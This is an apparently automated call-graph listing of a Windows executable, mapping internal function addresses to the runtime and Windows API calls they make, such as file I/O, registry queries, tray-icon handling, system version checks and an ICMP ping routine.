__wsopen_helper 100100->100146 100115 f20718 100101->100115 100104 f154e5 100105 f154fb 100104->100105 100106 f154ee 100104->100106 100108 f15525 100105->100108 100109 f15505 100105->100109 100147 f18d58 58 API calls __getptd_noexit 100106->100147 100130 f20837 100108->100130 100148 f18d58 58 API calls __getptd_noexit 100109->100148 100111 f154bf __wsopen_helper @_EH4_CallFilterFunc@8 100111->100052 100116 f20724 __wsopen_helper 100115->100116 100117 f19e3b __lock 58 API calls 100116->100117 100126 f20732 100117->100126 100118 f207ad 100155 f18a4d 58 API calls 2 library calls 100118->100155 100121 f20823 __wsopen_helper 100121->100104 100122 f207b4 100128 f207a6 100122->100128 100156 f1a05b InitializeCriticalSectionAndSpinCount 100122->100156 100123 f19ec3 __mtinitlocknum 58 API calls 100123->100126 100126->100118 100126->100123 100126->100128 100153 f16e7d 59 API calls __lock 100126->100153 100154 f16ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100126->100154 100127 f207da EnterCriticalSection 100127->100128 100150 f2082e 100128->100150 100131 f20857 __wopenfile 100130->100131 100132 f20871 100131->100132 100144 f20a2c 100131->100144 100163 f139fb 60 API calls 3 library calls 100131->100163 100161 f18d58 58 API calls __getptd_noexit 100132->100161 100134 f20876 100162 f18fe6 9 API calls __wsopen_helper 100134->100162 100136 f15530 100149 f15552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100136->100149 100137 f20a8f 100158 f287d1 100137->100158 100140 f20a25 100140->100144 100164 f139fb 60 API calls 3 library calls 100140->100164 100142 f20a44 100142->100144 100165 f139fb 60 API calls 3 library calls 100142->100165 100144->100132 100144->100137 100145->100100 100146->100111 100147->100111 100148->100111 100149->100111 100157 f19fa5 LeaveCriticalSection 100150->100157 100152 f20835 100152->100121 100153->100126 100154->100126 100155->100122 100156->100127 100157->100152 100166 f27fb5 100158->100166 100160 f287ea 100160->100136 100161->100134 100162->100136 100163->100140 100164->100142 100165->100144 100169 f27fc1 __wsopen_helper 100166->100169 100167 f27fd7 100168 f18d58 __flsbuf 58 API calls 100167->100168 100170 f27fdc 100168->100170 100169->100167 100171 f2800d 100169->100171 100172 f18fe6 __wsopen_helper 9 API calls 100170->100172 100173 f2807e __wsopen_nolock 109 API calls 100171->100173 100176 f27fe6 __wsopen_helper 100172->100176 100174 f28029 100173->100174 100175 f28052 __wsopen_helper LeaveCriticalSection 100174->100175 100175->100176 100176->100160 100178 f04af7 100177->100178 100179 f04bb3 LoadLibraryA 100177->100179 100178->100056 100178->100059 100179->100178 100180 f04bc4 GetProcAddress 100179->100180 100180->100178 100182 f40923 100181->100182 100183 f04a9b 100181->100183 100188 f15a6d 100183->100188 100186->100067 100187->100078 100189 f15a79 __wsopen_helper 100188->100189 100190 f15a8b 100189->100190 100192 f15ab1 100189->100192 100219 f18d58 58 API calls __getptd_noexit 100190->100219 100201 f16e3e 100192->100201 100194 f15a90 100220 f18fe6 9 API calls __wsopen_helper 100194->100220 100202 f16e70 EnterCriticalSection 100201->100202 100203 f16e4e 100201->100203 100205 f15ab7 100202->100205 100203->100202 100204 f16e56 100203->100204 100219->100194 100296 f1581d 100293->100296 100295 f04ad5 100295->100084 100297 f15829 __wsopen_helper 100296->100297 100298 f1586c 100297->100298 100299 f1583f _memset 100297->100299 100300 f15864 __wsopen_helper 100297->100300 100301 f16e3e __lock_file 59 API calls 100298->100301 100323 f18d58 58 API calls __getptd_noexit 100299->100323 100300->100295 100302 f15872 100301->100302 100309 f1563d 100302->100309 100305 f15859 100324 f18fe6 9 API calls __wsopen_helper 100305->100324 100313 f15658 _memset 100309->100313 100315 f15673 100309->100315 100310 f15663 100414 f18d58 58 API calls __getptd_noexit 100310->100414 100312 f15668 100415 f18fe6 9 API calls __wsopen_helper 100312->100415 100313->100310 100313->100315 100318 f156b3 100313->100318 100325 f158a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100315->100325 100317 f157c4 _memset 100417 f18d58 58 API calls __getptd_noexit 100317->100417 100318->100315 100318->100317 100319 f14906 __flsbuf 58 API calls 100318->100319 100326 f2108b 100318->100326 100394 f20dd7 100318->100394 100416 f20ef8 58 API calls 4 library calls 100318->100416 100319->100318 100323->100305 100324->100300 100325->100300 100327 f210c3 100326->100327 100328 f210ac 100326->100328 100330 f217fb 100327->100330 100334 f210fd 100327->100334 100329 f18d24 __write 58 API calls 100328->100329 100331 f210b1 100329->100331 100332 f18d24 __write 58 API calls 100330->100332 100333 f18d58 __flsbuf 58 API calls 100331->100333 100335 f21800 100332->100335 100374 f210b8 100333->100374 100337 f21105 100334->100337 100343 f2111c 100334->100343 100336 f18d58 __flsbuf 58 API calls 100335->100336 100338 f21111 100336->100338 100339 f18d24 __write 58 API calls 100337->100339 100340 f2110a 100339->100340 100346 f18d58 __flsbuf 58 API calls 100340->100346 100342 f21131 100344 f18d24 __write 58 API calls 100342->100344 100343->100342 100345 f2114b 100343->100345 100347 f21169 100343->100347 100343->100374 100344->100340 100345->100342 100351 f21156 100345->100351 100346->100338 100348 f18a4d __malloc_crt 58 API calls 100347->100348 100349 f21179 100348->100349 100350 f25e9b __flsbuf 58 API calls 100351->100350 100374->100318 100395 f20de2 100394->100395 100398 f20df7 100394->100398 100396 f18d58 __flsbuf 58 API calls 100395->100396 100397 f20de7 100396->100397 100399 f18fe6 __wsopen_helper 9 API calls 100397->100399 100400 f20e2c 100398->100400 100401 f26214 __getbuf 58 API calls 100398->100401 100406 f20df2 100398->100406 100399->100406 100402 f14906 __flsbuf 58 API calls 100400->100402 100401->100400 100403 f20e40 100402->100403 100404 f20f77 __read 72 API calls 100403->100404 100405 f20e47 100404->100405 100405->100406 100406->100318 100414->100312 100415->100315 100416->100318 100417->100312 100421 f1542a GetSystemTimeAsFileTime 100418->100421 100420 f59529 100420->100086 100422 f15458 __aulldiv 100421->100422 100422->100420 100424 f15e8c __wsopen_helper 100423->100424 100678 ef107d 100683 f02fc5 100678->100683 100680 ef108c 100681 f12f70 __cinit 67 API calls 100680->100681 100682 ef1096 100681->100682 100684 f02fd5 __ftell_nolock 100683->100684 100685 f01207 59 API calls 100684->100685 100686 f0308b 100685->100686 100687 f100cf 61 API calls 100686->100687 100688 f03094 100687->100688 100714 f108c1 100688->100714 100691 f01900 59 API calls 100692 f030ad 100691->100692 100693 f04c94 59 API calls 100692->100693 100694 f030bc 100693->100694 100695 f01207 59 API calls 100694->100695 100696 f030c5 100695->100696 100697 f019e1 59 API calls 100696->100697 100698 f030ce RegOpenKeyExW 100697->100698 100699 f401a3 RegQueryValueExW 100698->100699 100704 f030f0 Mailbox 100698->100704 100700 f40235 RegCloseKey 100699->100700 100701 f401c0 100699->100701 100700->100704 100713 f40247 _wcscat Mailbox __wsetenvp 100700->100713 100702 f10fe6 Mailbox 59 API calls 100701->100702 100703 f401d9 100702->100703 100706 f0433f 59 API calls 100703->100706 100704->100680 100705 f01609 59 API calls 100705->100713 100707 f401e4 RegQueryValueExW 100706->100707 100708 f40201 100707->100708 100710 f4021b 100707->100710 100709 f01821 59 API calls 100708->100709 100709->100710 100710->100700 100711 f01a36 59 API calls 100711->100713 100712 f04c94 59 API calls 100712->100713 100713->100704 100713->100705 100713->100711 100713->100712 100715 f21b70 __ftell_nolock 100714->100715 100716 f108ce GetFullPathNameW 100715->100716 100717 f108f0 100716->100717 100718 f01821 59 API calls 100717->100718 100719 f0309f 100718->100719 100719->100691 97939 ef9a6c 97942 ef829c 97939->97942 97941 ef9a78 97943 ef82b4 97942->97943 97950 ef8308 97942->97950 97943->97950 97951 ef53b0 97943->97951 97946 f30ed8 97946->97946 97947 ef8331 97947->97941 97948 ef82eb 97948->97947 97979 ef523c 59 API calls 97948->97979 97950->97947 97980 f5a48d 89 API calls 4 library calls 97950->97980 97952 ef53cf 97951->97952 97975 ef53fd Mailbox 97951->97975 97981 f10fe6 97952->97981 97954 ef69ff 97957 f2e691 97954->97957 97958 f2f165 97954->97958 97955 ef69fa 97956 f01c9c 59 API calls 97955->97956 97973 ef5569 Mailbox 97956->97973 97993 f5a48d 89 API calls 4 library calls 97957->97993 98001 f5a48d 89 API calls 4 library calls 97958->98001 97959 f01207 59 API calls 97959->97975 97963 f2e6a0 97963->97948 97964 f10fe6 59 API calls Mailbox 97964->97975 97966 f2ea9a 97994 f01c9c 97966->97994 97967 f01c9c 59 API calls 97967->97975 97970 f2eb67 97970->97973 97998 f47aad 59 API calls 97970->97998 97971 f12f70 67 API calls __cinit 97971->97975 97972 f47aad 59 API calls 97972->97975 97973->97948 97975->97954 97975->97955 97975->97957 97975->97959 97975->97964 97975->97966 97975->97967 97975->97970 97975->97971 97975->97972 97975->97973 97976 f2ef28 97975->97976 97978 ef5a1a 97975->97978 97991 ef7e50 299 API calls 2 library calls 97975->97991 97992 ef6e30 60 API calls Mailbox 97975->97992 97999 f5a48d 89 API calls 4 library calls 97976->97999 98000 f5a48d 89 API calls 4 library calls 97978->98000 97979->97950 97980->97946 97984 f10fee 97981->97984 97983 f11008 97983->97975 97984->97983 97986 f1100c std::exception::exception 97984->97986 98002 f1593c 97984->98002 98019 f135d1 DecodePointer 97984->98019 98020 f187cb RaiseException 97986->98020 97988 f11036 98021 f18701 58 API calls _free 97988->98021 97990 f11048 97990->97975 97991->97975 97992->97975 97993->97963 97995 f01ca7 97994->97995 97996 f01caf 97994->97996 98030 f01bcc 59 API calls 2 library calls 97995->98030 97996->97973 97998->97973 97999->97978 98000->97973 98001->97973 98003 f159b7 98002->98003 98011 f15948 98002->98011 98028 f135d1 DecodePointer 98003->98028 98005 f159bd 98029 f18d58 58 API calls __getptd_noexit 98005->98029 98008 f1597b RtlAllocateHeap 98008->98011 98018 f159af 98008->98018 98010 f159a3 98026 f18d58 58 API calls __getptd_noexit 98010->98026 98011->98008 98011->98010 98015 f159a1 98011->98015 98016 f15953 98011->98016 98025 f135d1 DecodePointer 98011->98025 98027 f18d58 58 API calls __getptd_noexit 98015->98027 98016->98011 98022 f1a39b 58 API calls 2 library calls 98016->98022 98023 f1a3f8 58 API calls 8 library calls 98016->98023 98024 f132cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98016->98024 98018->97984 98019->97984 98020->97988 98021->97990 98022->98016 98023->98016 98025->98011 98026->98015 98027->98018 98028->98005 98029->98018 98030->97996 100720 f04d83 100721 f04dba 100720->100721 100722 f04e37 100721->100722 100723 f04dd8 100721->100723 100760 f04e35 100721->100760 100725 f409c2 100722->100725 100726 f04e3d 100722->100726 100727 f04de5 100723->100727 100728 f04ead PostQuitMessage 100723->100728 100724 f04e1a DefWindowProcW 100762 f04e28 100724->100762 100775 efc460 10 API calls Mailbox 100725->100775 100729 f04e42 100726->100729 100730 f04e65 SetTimer RegisterWindowMessageW 100726->100730 100731 f04df0 100727->100731 100732 f40a35 100727->100732 100728->100762 100734 f40965 100729->100734 100735 f04e49 KillTimer 100729->100735 100736 f04e8e CreatePopupMenu 100730->100736 100730->100762 100737 f04eb7 100731->100737 100738 f04df8 100731->100738 100778 f52cce 97 API calls _memset 100732->100778 100743 f4099e MoveWindow 100734->100743 100744 f4096a 100734->100744 100745 f05ac3 Shell_NotifyIconW 100735->100745 100736->100762 100765 f05b29 100737->100765 100746 f04e03 100738->100746 100747 f40a1a 100738->100747 100740 f409e9 100776 efc483 299 API calls Mailbox 100740->100776 100743->100762 100749 f4098d SetFocus 100744->100749 100750 f4096e 100744->100750 100751 f04e5c 100745->100751 100752 f04e9b 100746->100752 100758 f04e0e 100746->100758 100747->100724 100777 f48854 59 API calls Mailbox 100747->100777 100748 f40a47 100748->100724 100748->100762 100749->100762 100753 f40977 100750->100753 100750->100758 100772 ef34e4 DeleteObject DestroyWindow Mailbox 100751->100772 100773 f05bd7 107 API calls _memset 100752->100773 100774 efc460 10 API calls Mailbox 100753->100774 100757 f04eab 100757->100762 100758->100724 100761 f05ac3 Shell_NotifyIconW 100758->100761 100760->100724 100763 f40a0e 100761->100763 100764 f059d3 94 API calls 100763->100764 100764->100760 100766 f05b40 _memset 100765->100766 100767 f05bc2 100765->100767 100768 f056f8 87 API calls 100766->100768 100767->100762 100770 f05b67 100768->100770 100769 f05bab KillTimer SetTimer 100769->100767 100770->100769 100771 f40d6e Shell_NotifyIconW 100770->100771 100771->100769 100772->100762 100773->100757 100774->100762 100775->100740 100776->100758 100777->100760 100778->100748 98031 ef9a88 98034 ef86e0 98031->98034 98035 ef86fd 98034->98035 98036 f30ff8 98035->98036 98037 f30fad 98035->98037 98057 ef8724 98035->98057 98081 f6aad0 299 API calls __cinit 98036->98081 98040 f30fb5 98037->98040 98043 f30fc2 98037->98043 98037->98057 98079 f6b0e4 299 API calls 98040->98079 98059 ef898d 98043->98059 98080 f6b58c 299 API calls 3 library calls 98043->98080 98045 f31289 98045->98045 98046 ef3c30 68 API calls 98046->98057 98048 f311af 98084 f6ae3b 89 API calls 98048->98084 98051 ef8a17 98057->98046 98057->98048 98057->98051 98058 ef3f42 68 API calls 98057->98058 98057->98059 98060 ef53b0 299 API calls 98057->98060 98061 f01c9c 59 API calls 98057->98061 98063 ef39be 98057->98063 98067 ef3938 68 API calls 98057->98067 98068 ef855e 299 API calls 98057->98068 98069 ef5278 98057->98069 98074 f12f70 98057->98074 98077 ef84e2 89 API calls 98057->98077 98078 ef835f 299 API calls 98057->98078 98082 ef523c 59 API calls 98057->98082 98083 f473ab 59 API calls 98057->98083 98058->98057 98059->98051 98085 f5a48d 89 API calls 4 library calls 98059->98085 98060->98057 98061->98057 98064 ef39c9 98063->98064 98066 ef39f0 98064->98066 98086 ef3ea3 68 API calls Mailbox 98064->98086 98066->98057 98067->98057 98068->98057 98070 f10fe6 Mailbox 59 API calls 98069->98070 98071 ef5285 98070->98071 98072 ef5294 98071->98072 98087 f01a36 98071->98087 98072->98057 98091 f12e74 98074->98091 98076 f12f7b 98076->98057 98077->98057 98078->98057 98079->98043 98080->98059 98081->98057 98082->98057 98083->98057 98084->98059 98085->98045 98086->98066 98088 f01a45 __wsetenvp _memmove 98087->98088 98089 f10fe6 Mailbox 59 API calls 98088->98089 98090 f01a83 98089->98090 98090->98072 98092 f12e80 __wsopen_helper 98091->98092 98099 f13447 98092->98099 98098 f12ea7 __wsopen_helper 98098->98076 98116 f19e3b 98099->98116 98101 f12e89 98102 f12eb8 DecodePointer DecodePointer 98101->98102 98103 f12ee5 98102->98103 98104 f12e95 98102->98104 98103->98104 98162 f189d4 59 API calls 2 library calls 98103->98162 98113 f12eb2 98104->98113 98106 f12f48 EncodePointer EncodePointer 98106->98104 98107 f12f1c 98107->98104 98112 f12f36 EncodePointer 98107->98112 98164 f18a94 61 API calls __realloc_crt 98107->98164 98108 f12ef7 98108->98106 98108->98107 98163 f18a94 61 API calls __realloc_crt 98108->98163 98111 f12f30 98111->98104 98111->98112 98112->98106 98165 f13450 98113->98165 98117 f19e4c 98116->98117 98118 f19e5f EnterCriticalSection 98116->98118 98123 f19ec3 98117->98123 98118->98101 98120 f19e52 98120->98118 98147 f132e5 58 API calls 3 library calls 98120->98147 98124 f19ecf __wsopen_helper 98123->98124 98125 f19ed8 98124->98125 98127 f19ef0 98124->98127 98148 f1a39b 58 API calls 2 library calls 98125->98148 98135 f19f11 __wsopen_helper 98127->98135 98151 f18a4d 58 API calls 2 library calls 98127->98151 98128 f19edd 98149 f1a3f8 58 API calls 8 library calls 98128->98149 98131 f19f05 98133 f19f1b 98131->98133 98134 f19f0c 98131->98134 98132 f19ee4 98150 f132cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98132->98150 98138 f19e3b __lock 58 API calls 98133->98138 98152 f18d58 58 API calls __getptd_noexit 98134->98152 98135->98120 98140 f19f22 98138->98140 98141 f19f47 98140->98141 98142 f19f2f 98140->98142 98154 f12f85 98141->98154 98153 f1a05b InitializeCriticalSectionAndSpinCount 98142->98153 98145 f19f3b 98160 f19f63 LeaveCriticalSection _doexit 98145->98160 98148->98128 98149->98132 98151->98131 98152->98135 98153->98145 98155 f12f8e RtlFreeHeap 98154->98155 98159 f12fb7 _free 98154->98159 98156 f12fa3 98155->98156 98155->98159 98161 f18d58 58 API calls __getptd_noexit 98156->98161 98158 f12fa9 GetLastError 98158->98159 98159->98145 98160->98135 98161->98158 98162->98108 98163->98107 98164->98111 98168 f19fa5 LeaveCriticalSection 98165->98168 98167 f12eb7 98167->98098 98168->98167 98169 ef1066 98174 efaaaa 98169->98174 98171 ef106c 98172 f12f70 __cinit 67 API calls 98171->98172 98173 ef1076 98172->98173 98175 efaacb 98174->98175 98207 f102eb 98175->98207 98179 efab12 98217 f01207 98179->98217 98182 f01207 59 API calls 98183 efab26 98182->98183 98184 f01207 59 API calls 98183->98184 98185 efab30 98184->98185 98186 f01207 59 API calls 98185->98186 98187 efab6e 98186->98187 98188 f01207 59 API calls 98187->98188 98189 efac39 98188->98189 98222 f10588 98189->98222 98193 efac6b 98194 f01207 59 API calls 98193->98194 98195 efac75 98194->98195 98250 f0fe2b 98195->98250 98197 efacbc 98198 efaccc GetStdHandle 98197->98198 98199 efad18 98198->98199 98200 f32f39 98198->98200 98201 efad20 OleInitialize 98199->98201 98200->98199 98202 f32f42 98200->98202 98201->98171 98257 f570f3 64 API calls Mailbox 98202->98257 98204 f32f49 98258 f577c2 CreateThread 98204->98258 98206 f32f55 CloseHandle 98206->98201 98259 f103c4 98207->98259 98210 f103c4 59 API calls 98211 f1032d 98210->98211 98212 f01207 59 API calls 98211->98212 98213 f10339 98212->98213 98266 f01821 98213->98266 98215 efaad1 98216 f107bb 6 API calls 98215->98216 98216->98179 98218 f10fe6 Mailbox 59 API calls 98217->98218 98219 f01228 98218->98219 98220 f10fe6 Mailbox 59 API calls 98219->98220 98221 efab1c 98220->98221 98221->98182 98223 f01207 59 API calls 98222->98223 98224 f10598 98223->98224 98225 f01207 59 API calls 98224->98225 98226 f105a0 98225->98226 98287 f010c3 98226->98287 98229 f010c3 59 API calls 98230 f105b0 98229->98230 98231 f01207 59 API calls 98230->98231 98232 f105bb 98231->98232 98233 f10fe6 Mailbox 59 API calls 98232->98233 98234 efac43 98233->98234 98235 f0ff4c 98234->98235 98236 f0ff5a 98235->98236 98237 f01207 59 API calls 98236->98237 98238 f0ff65 98237->98238 98239 f01207 59 API calls 98238->98239 98240 f0ff70 98239->98240 98241 f01207 59 API calls 98240->98241 98242 f0ff7b 98241->98242 98243 f01207 59 API calls 98242->98243 98244 f0ff86 98243->98244 98245 f010c3 59 API calls 98244->98245 98246 f0ff91 98245->98246 98247 f10fe6 Mailbox 59 API calls 98246->98247 98248 f0ff98 RegisterWindowMessageW 98247->98248 98248->98193 98251 f4620c 98250->98251 98252 f0fe3b 98250->98252 98290 f5a12a 59 API calls 98251->98290 98254 f10fe6 Mailbox 59 API calls 98252->98254 98256 f0fe43 98254->98256 98255 f46217 98256->98197 98257->98204 98258->98206 98291 f577a8 65 API calls 98258->98291 98260 f01207 59 API calls 98259->98260 98261 f103cf 98260->98261 98262 f01207 59 API calls 98261->98262 98263 f103d7 98262->98263 98264 f01207 59 API calls 98263->98264 98265 f10323 98264->98265 98265->98210 98267 f0189a 98266->98267 98268 f0182d __wsetenvp 98266->98268 98279 f01981 98267->98279 98270 f01843 98268->98270 98271 f01868 98268->98271 98275 f01b7c 59 API calls Mailbox 98270->98275 98276 f01c7e 98271->98276 98274 f0184b _memmove 98274->98215 98275->98274 98277 f10fe6 Mailbox 59 API calls 98276->98277 98278 f01c88 98277->98278 98278->98274 98280 f01998 _memmove 98279->98280 98281 f0198f 98279->98281 98280->98274 98281->98280 98283 f01aa4 98281->98283 98284 f01ab7 98283->98284 98286 f01ab4 _memmove 98283->98286 98285 f10fe6 Mailbox 59 API calls 98284->98285 98285->98286 98286->98280 98288 f01207 59 API calls 98287->98288 98289 f010cb 98288->98289 98289->98229 98290->98255 100779 ef1016 100784 f05ce7 100779->100784 100782 f12f70 __cinit 67 API calls 100783 ef1025 100782->100783 100785 f10fe6 Mailbox 59 API calls 100784->100785 100786 f05cef 100785->100786 100787 ef101b 100786->100787 100791 f05f39 100786->100791 100787->100782 100792 f05f42 100791->100792 100794 f05cfb 100791->100794 100793 f12f70 __cinit 67 API calls 100792->100793 100793->100794 100795 f05d13 100794->100795 100796 f01207 59 API calls 100795->100796 100797 f05d2b GetVersionExW 100796->100797 100798 f01821 59 API calls 100797->100798 100799 f05d6e 100798->100799 100800 f01981 59 API calls 100799->100800 100809 f05d9b 100799->100809 100801 f05d8f 100800->100801 100802 f0133d 59 API calls 100801->100802 100802->100809 100803 f05e00 GetCurrentProcess IsWow64Process 100804 f05e19 100803->100804 100806 f05e98 GetSystemInfo 100804->100806 100807 f05e2f 100804->100807 100805 f41098 100810 f05e65 100806->100810 100819 f055f0 100807->100819 100809->100803 100809->100805 100810->100787 100812 f05e41 100814 f055f0 2 API calls 100812->100814 100813 f05e8c GetSystemInfo 100815 f05e56 100813->100815 100816 f05e49 GetNativeSystemInfo 100814->100816 100815->100810 100817 f05e5c FreeLibrary 100815->100817 100816->100815 100817->100810 100820 f05619 100819->100820 100821 f055f9 LoadLibraryA 100819->100821 100820->100812 100820->100813 100821->100820 100822 f0560a GetProcAddress 100821->100822 100822->100820 100823 ef1055 100828 ef2a19 100823->100828 100826 f12f70 __cinit 67 API calls 100827 ef1064 100826->100827 100829 f01207 59 API calls 100828->100829 100830 ef2a87 100829->100830 100835 ef1256 100830->100835 100833 ef2b24 100834 ef105a 100833->100834 100838 ef13f8 59 API calls 2 library calls 100833->100838 100834->100826 100839 ef1284 100835->100839 100838->100833 100840 ef1275 100839->100840 100841 ef1291 100839->100841 100840->100833 100841->100840 100842 ef1298 RegOpenKeyExW 100841->100842 100842->100840 100843 ef12b2 RegQueryValueExW 100842->100843 100844 ef12e8 RegCloseKey 100843->100844 100845 ef12d3 100843->100845 100844->100840 100845->100844 100846 ef5ff5 100870 ef5ede Mailbox _memmove 100846->100870 100847 f10fe6 59 API calls Mailbox 100847->100870 100848 ef6a9b 101052 efa9de 299 API calls 100848->101052 100849 ef53b0 299 API calls 100849->100870 100851 f2eff9 101064 ef5190 59 API calls Mailbox 100851->101064 100853 f2f007 101065 f5a48d 89 API calls 4 library calls 100853->101065 100856 f2efeb 100904 ef5569 Mailbox 100856->100904 101063 f46cf1 59 API calls Mailbox 100856->101063 100858 ef60e5 100859 f2e137 100858->100859 100864 ef63bd Mailbox 100858->100864 100871 ef6abc 100858->100871 100890 ef6152 Mailbox 100858->100890 100859->100864 101053 f47aad 59 API calls 100859->101053 100860 f01c9c 59 API calls 100860->100870 100862 f10fe6 Mailbox 59 API calls 100867 ef63d1 100862->100867 100863 f01a36 59 API calls 100863->100870 100864->100862 100877 ef6426 100864->100877 100869 ef63de 100867->100869 100867->100871 100868 f6c355 299 API calls 100868->100870 100872 f2e172 100869->100872 100873 ef6413 100869->100873 100870->100847 100870->100848 100870->100849 100870->100851 100870->100853 100870->100858 100870->100860 100870->100863 100870->100868 100870->100871 100870->100904 101051 ef523c 59 API calls 100870->101051 101056 f57f11 59 API calls Mailbox 100870->101056 101057 f46cf1 59 API calls Mailbox 100870->101057 101062 f5a48d 89 API calls 4 library calls 100871->101062 101054 f6c87c 85 API calls 2 library calls 100872->101054 100873->100877 100903 ef5447 Mailbox 100873->100903 101055 f6c9c9 95 API calls Mailbox 100877->101055 100879 f2e19d 100879->100879 100880 f10fe6 59 API calls Mailbox 100880->100903 100881 f2e691 101059 f5a48d 89 API calls 4 library calls 100881->101059 100882 f2f165 101067 f5a48d 89 API calls 4 library calls 100882->101067 100886 ef69fa 100895 f01c9c 59 API calls 100886->100895 100888 f2e6a0 100889 f01c9c 59 API calls 100889->100903 100890->100856 100890->100871 100891 f2e2e9 VariantClear 100890->100891 100890->100904 100908 f6f1b2 91 API calls 100890->100908 100911 f6e60c 130 API calls 100890->100911 100914 f5412a 3 API calls 100890->100914 100916 efd679 100890->100916 100956 efcfd7 100890->100956 100975 f5d6be 100890->100975 101020 f65e1d 100890->101020 101045 f5413a 100890->101045 101050 ef5190 59 API calls Mailbox 100890->101050 101058 f47aad 59 API calls 100890->101058 100891->100890 100893 f2ea9a 100898 f01c9c 59 API calls 100893->100898 100894 ef69ff 100894->100881 100894->100882 100895->100904 100896 f01207 59 API calls 100896->100903 100898->100904 100899 f47aad 59 API calls 100899->100903 100900 f2eb67 100900->100904 101060 f47aad 59 API calls 100900->101060 100901 f12f70 67 API calls __cinit 100901->100903 100903->100880 100903->100881 100903->100886 100903->100889 100903->100893 100903->100894 100903->100896 100903->100899 100903->100900 100903->100901 100903->100904 100905 f2ef28 100903->100905 100907 ef5a1a 100903->100907 101048 ef7e50 299 API calls 2 library calls 100903->101048 101049 ef6e30 60 API calls Mailbox 100903->101049 101061 f5a48d 89 API calls 4 library calls 100905->101061 101066 f5a48d 89 API calls 4 library calls 100907->101066 100908->100890 100911->100890 100914->100890 101068 ef4f98 100916->101068 100920 f10fe6 Mailbox 59 API calls 100921 efd6aa 100920->100921 100922 efd6ba 100921->100922 101095 f03df7 60 API calls Mailbox 100921->101095 100926 ef4d37 84 API calls 100922->100926 100923 f35068 100924 efd6df 100923->100924 101100 f5fbb7 59 API calls 100923->101100 100927 ef502b 59 API calls 100924->100927 100931 efd6ec 100924->100931 100928 efd6c8 100926->100928 100929 f350b0 100927->100929 100930 f03e47 67 API calls 100928->100930 100929->100931 100932 f350b8 100929->100932 100933 efd6d7 100930->100933 101081 f041d6 100931->101081 100934 ef502b 59 API calls 100932->100934 100933->100923 100933->100924 101099 f03f0b CloseHandle 100933->101099 100937 efd6f3 100934->100937 100938 efd70d 100937->100938 100939 f350ca 100937->100939 100940 f01207 59 API calls 100938->100940 100941 f10fe6 Mailbox 59 API calls 100939->100941 100942 efd715 100940->100942 100943 f350d0 100941->100943 101096 f03b7b 65 API calls Mailbox 100942->101096 100945 f350e4 100943->100945 100948 f03ea1 2 API calls 100943->100948 100950 f350e8 _memmove 100945->100950 101086 f57c7f 100945->101086 100947 efd724 100947->100950 101097 ef4f3c 59 API calls Mailbox 100947->101097 100948->100945 100951 efd738 Mailbox 100952 efd772 100951->100952 100953 f042cf CloseHandle 100951->100953 100952->100890 100954 efd766 100953->100954 100954->100952 101098 f03f0b CloseHandle 100954->101098 100957 ef4d37 84 API calls 100956->100957 100958 efd001 100957->100958 100959 ef5278 59 API calls 100958->100959 100960 efd018 100959->100960 100961 efd57b 100960->100961 100962 ef502b 59 API calls 100960->100962 100970 efd439 Mailbox __wsetenvp 100960->100970 100961->100890 100962->100970 100963 f1312d _W_store_winword 60 API calls 100963->100970 100964 f0162d 59 API calls 100964->100970 100965 f10c65 62 API calls 100965->100970 100967 ef4f98 59 API calls 100967->100970 100969 ef4d37 84 API calls 100969->100970 100970->100961 100970->100963 100970->100964 100970->100965 100970->100967 100970->100969 100971 f01821 59 API calls 100970->100971 100972 f059d3 94 API calls 100970->100972 100973 f05ac3 Shell_NotifyIconW 100970->100973 100974 ef502b 59 API calls 100970->100974 101101 f0153b 59 API calls 2 library calls 100970->101101 101102 ef4f3c 59 API calls Mailbox 100970->101102 100971->100970 100972->100970 100973->100970 100974->100970 100976 f5d6dd 100975->100976 100977 f5d6e8 100975->100977 100978 ef502b 59 API calls 100976->100978 100981 f01207 59 API calls 100977->100981 101018 f5d7c2 Mailbox 100977->101018 100978->100977 100979 f10fe6 Mailbox 59 API calls 100980 f5d80b 100979->100980 100983 f5d817 100980->100983 101103 f03df7 60 API calls Mailbox 100980->101103 100982 f5d70c 100981->100982 100984 f01207 59 API calls 100982->100984 100986 ef4d37 84 API calls 100983->100986 100987 f5d715 100984->100987 100988 f5d82f 100986->100988 100989 ef4d37 84 API calls 100987->100989 100990 f03e47 67 API calls 100988->100990 100991 f5d721 100989->100991 100992 f5d83e 100990->100992 100993 f10119 59 API calls 100991->100993 100994 f5d876 100992->100994 100995 f5d842 GetLastError 100992->100995 100996 f5d736 100993->100996 100999 f5d8a1 100994->100999 101000 f5d8d8 100994->101000 100997 f5d85b 100995->100997 100998 f017e0 59 API calls 100996->100998 101015 f5d7cb Mailbox 100997->101015 101104 f03f0b CloseHandle 100997->101104 101001 f5d769 100998->101001 101002 f10fe6 Mailbox 59 API calls 100999->101002 101003 f10fe6 Mailbox 59 API calls 101000->101003 101007 f5412a 3 API calls 101001->101007 101019 f5d793 Mailbox 101001->101019 101004 f5d8a6 101002->101004 101008 f5d8dd 101003->101008 101009 f5d8b7 101004->101009 101011 f01207 59 API calls 101004->101011 101006 ef502b 59 API calls 101006->101018 101010 f5d779 101007->101010 101012 f01207 59 API calls 101008->101012 101008->101015 101105 f5fc0d 59 API calls 2 library calls 101009->101105 101014 f01a36 59 API calls 101010->101014 101010->101019 101011->101009 101012->101015 101016 f5d78a 101014->101016 101015->100890 101017 f53f1d 63 API calls 101016->101017 101017->101019 101018->100979 101018->101015 101019->101006 101021 f65e46 101020->101021 101022 f65e74 WSAStartup 101021->101022 101023 ef502b 59 API calls 101021->101023 101024 f65e9d 101022->101024 101034 f65e88 Mailbox 101022->101034 101026 f65e61 101023->101026 101025 f040cd 59 API calls 101024->101025 101027 f65ea6 101025->101027 101026->101022 101029 ef502b 59 API calls 101026->101029 101028 ef4d37 84 API calls 101027->101028 101030 f65eb2 101028->101030 101031 f65e70 101029->101031 101032 f0402a 61 API calls 101030->101032 101031->101022 101033 f65ebf inet_addr gethostbyname 101032->101033 101033->101034 101035 f65edd IcmpCreateFile 101033->101035 101034->100890 101035->101034 101036 f65f01 101035->101036 101037 f10fe6 Mailbox 59 API calls 101036->101037 101038 f65f1a 101037->101038 101039 f0433f 59 API calls 101038->101039 101040 f65f25 101039->101040 101041 f65f34 IcmpSendEcho 101040->101041 101042 f65f55 IcmpSendEcho 101040->101042 101043 f65f6d 101041->101043 